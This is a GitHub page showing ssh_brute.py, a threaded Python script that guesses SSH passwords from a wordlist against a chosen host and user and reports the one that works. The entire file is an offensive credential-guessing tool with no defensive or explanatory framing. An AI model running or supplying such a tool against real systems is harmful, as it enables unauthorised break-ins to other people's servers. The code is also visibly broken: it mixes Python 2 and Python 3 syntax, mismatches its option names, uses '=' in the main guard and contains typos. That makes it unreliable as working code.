-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathssh_brute.py
More file actions
60 lines (52 loc) · 1.79 KB
/
Copy pathssh_brute.py
File metadata and controls
60 lines (52 loc) · 1.79 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
import pxssh
import optparse
import time
from threading import *
connection_lock = BoundedSemaphore(value=5)
Found = False
Fails = 0
def connect(host, user, password, release):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host, user, password)
print(f'[+] Password Found: {password}')
Found = True
except Exception, e:
if 'read_nonbloacking' in str(e):
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
connect(host, user, password, False)
finally:
if release: connection_lock.release()
def main():
parser = optparse.OptionParser('usage %prog '+'-H <target host> -u <user> -F <password list>')
parser.add_option('-H', dest='tgt_host', type='string', help='specify target host')
parser.add_option('-F', dest='passwd_file', type='string', help='specify password file')
parser.add_option('-u', dest='user', type='string', help='specify user host')
(options, args) = parser.parse_args()
host = options.tgtHost
passwd_file = options.passwdFile
user = options.user
if not host or not passwd_file or not user:
print(parser.usage)
exit(0)
fn = open(passwd_file, 'r')
for line in fn.readlines():
if Found:
print("[!] Exiting: Password Found")
exit(0)
if Fails > 5:
print("[!] Exiting: Too Many Socket Timeouts")
exit (0)
connection_lock.acquire()
password = line.strip('\r').strip('\n')
print(f"[-] Testing: {password}")
t = Thread(target=connect, args=(host, user, password, True))
child = t.start()
if __name__ = '__main__':
main()